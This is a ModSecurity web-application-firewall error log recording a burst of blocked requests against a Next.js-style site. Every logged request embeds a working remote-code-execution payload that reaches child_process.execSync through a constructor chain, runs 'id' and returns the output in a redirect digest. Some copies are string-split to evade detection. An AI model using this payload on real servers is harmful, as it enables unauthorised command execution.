{\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zqms=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _iwvm=Buffer.from(_zqms).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_iwvm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgOAAAAQA"] [Sun Jan 25 23:04:57.620165 2026] [:error] [pid 10591:tid 10798] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _psaq=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _oeyg=Buffer.from(_psaq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oeyg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgOQAAARY"] [Sun Jan 25 23:04:57.652020 2026] [:error] [pid 10591:tid 10746] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zogz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dtcy=Buffer.from(_zogz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dtcy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeXTJLg3zv-3QoTSgOgAAAQU"] [Sun Jan 25 23:04:57.683856 2026] [:error] [pid 10591:tid 10775] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ypqi=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _buoq=Buffer.from(_ypqi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_buoq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeXTJLg3zv-3QoTSgPAAAAQ0"] [Sun Jan 25 23:04:57.715338 2026] [:error] [pid 10591:tid 10796] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ojsj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bfsr=Buffer.from(_ojsj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bfsr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeXTJLg3zv-3QoTSgPQAAARQ"] [Sun Jan 25 23:04:57.747338 2026] [:error] [pid 10591:tid 10789] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pblh=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cwgg=Buffer.from(_pblh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cwgg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeXTJLg3zv-3QoTSgPgAAARE"] [Sun Jan 25 23:04:57.779389 2026] [:error] [pid 10591:tid 10743] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fctg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _iogi=Buffer.from(_fctg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_iogi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgPwAAAQQ"] [Sun Jan 25 23:04:57.811125 2026] [:error] [pid 10591:tid 10752] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fnxp=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _uoey=Buffer.from(_fnxp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uoey};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgQAAAAQc"] [Sun Jan 25 23:04:57.842521 2026] [:error] [pid 10591:tid 10799] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ygmd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _eoud=Buffer.from(_ygmd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_eoud};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFeXTJLg3zv-3QoTSgQQAAARc"] [Sun Jan 25 23:04:57.872925 2026] [:error] [pid 10591:tid 10781] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lvdm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _azhc=Buffer.from(_lvdm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_azhc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFeXTJLg3zv-3QoTSgQgAAAQ8"] [Sun Jan 25 23:04:57.904716 2026] [:error] [pid 10591:tid 10759] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ryqk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ibnd=Buffer.from(_ryqk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ibnd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFeXTJLg3zv-3QoTSgRAAAAQk"] [Sun Jan 25 23:04:57.937212 2026] [:error] [pid 10591:tid 10748] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sfvl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zzui=Buffer.from(_sfvl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zzui};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFeXTJLg3zv-3QoTSgRQAAAQY"] [Sun Jan 25 23:04:57.968982 2026] [:error] [pid 10591:tid 10792] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gmvl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uthj=Buffer.from(_gmvl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uthj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgRgAAARI"] [Sun Jan 25 23:04:58.007744 2026] [:error] [pid 10591:tid 10756] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rnco=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _btpf=Buffer.from(_rnco).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_btpf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFeXTJLg3zv-3QoTSgRwAAAQg"] [Sun Jan 25 23:04:58.038197 2026] [:error] [pid 10591:tid 10785] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rhmm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pmqd=Buffer.from(_rhmm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pmqd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aXaFenTJLg3zv-3QoTSgSAAAARA"] [Sun Jan 25 23:04:58.068241 2026] [:error] [pid 10591:tid 10795] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qxfp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dxsj=Buffer.from(_qxfp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dxsj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aXaFenTJLg3zv-3QoTSgSQAAARM"] [Sun Jan 25 23:04:58.097925 2026] [:error] [pid 10591:tid 10800] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qjrn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zfzy=Buffer.from(_qjrn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zfzy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aXaFenTJLg3zv-3QoTSgSgAAARg"] [Sun Jan 25 23:04:58.128191 2026] [:error] [pid 10591:tid 10728] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _njlc=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zoee=Buffer.from(_njlc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zoee};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aXaFenTJLg3zv-3QoTSgSwAAAQE"] [Sun Jan 25 23:04:58.159604 2026] [:error] [pid 10591:tid 10734] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bscx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ftlo=Buffer.from(_bscx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ftlo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFenTJLg3zv-3QoTSgTAAAAQI"] [Sun Jan 25 23:04:58.189920 2026] [:error] [pid 10591:tid 10778] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bjcm=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ccai=Buffer.from(_bjcm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ccai};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aXaFenTJLg3zv-3QoTSgTQAAAQ4"] [Sun Jan 25 23:04:58.220566 2026] [:error] [pid 10591:tid 10762] [client 23.180.120.132:35180] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file 